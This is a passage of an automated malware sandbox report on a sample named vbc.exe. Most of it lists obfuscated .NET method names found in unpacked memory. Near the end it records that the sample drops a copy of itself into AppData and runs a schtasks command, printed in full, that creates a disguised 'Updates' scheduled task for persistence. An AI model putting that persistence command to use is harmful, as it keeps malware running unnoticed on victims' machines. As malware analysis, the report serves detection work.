          Source: 0.0.vbc.exe.6f0000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.csHigh entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 0.0.vbc.exe.6f0000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 0.0.vbc.exe.6f0000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.csHigh entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 0.0.vbc.exe.6f0000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 0.0.vbc.exe.6f0000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.5.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.csHigh entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.5.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.csHigh entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.5.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.csHigh entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.5.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.5.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.0.vbc.exe.d10000.5.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.5.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.csHigh entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.5.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.csHigh entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.2.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.csHigh entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.2.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.csHigh entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.2.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.csHigh entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.2.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.csHigh entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.2.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.2.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.csHigh entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.2.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.2.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.0.vbc.exe.d10000.7.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.csHigh entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.7.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.csHigh entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.7.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.csHigh entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.7.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.csHigh entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.7.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.csHigh entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.7.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.7.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.7.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.0.vbc.exe.d10000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.csHigh entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.csHigh entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.csHigh entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.csHigh entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.0.vbc.exe.d10000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.csHigh entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.9.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.csHigh entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.9.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.csHigh entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.9.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.csHigh entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.9.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.csHigh entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.9.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.csHigh entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.9.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.9.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.9.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.0.vbc.exe.d10000.3.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.csHigh entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.3.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.csHigh entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.3.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.csHigh entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.3.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.csHigh entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.3.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.csHigh entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.3.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.3.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.0.vbc.exe.d10000.3.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.2.vbc.exe.d10000.1.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.csHigh entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.2.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.csHigh entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.2.vbc.exe.d10000.1.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.csHigh entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.2.vbc.exe.d10000.1.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.csHigh entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.2.vbc.exe.d10000.1.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.csHigh entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.2.vbc.exe.d10000.1.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.2.vbc.exe.d10000.1.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 8.2.vbc.exe.d10000.1.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.1.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.csHigh entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 8.0.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.csHigh entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 8.0.vbc.exe.d10000.1.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.csHigh entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 8.0.vbc.exe.d10000.1.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.csHigh entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 8.0.vbc.exe.d10000.1.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.csHigh entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 8.0.vbc.exe.d10000.1.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.csHigh entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 8.0.vbc.exe.d10000.1.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.csHigh entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 8.0.vbc.exe.d10000.1.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.csHigh entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: C:\Users\user\Desktop\vbc.exeFile created: C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
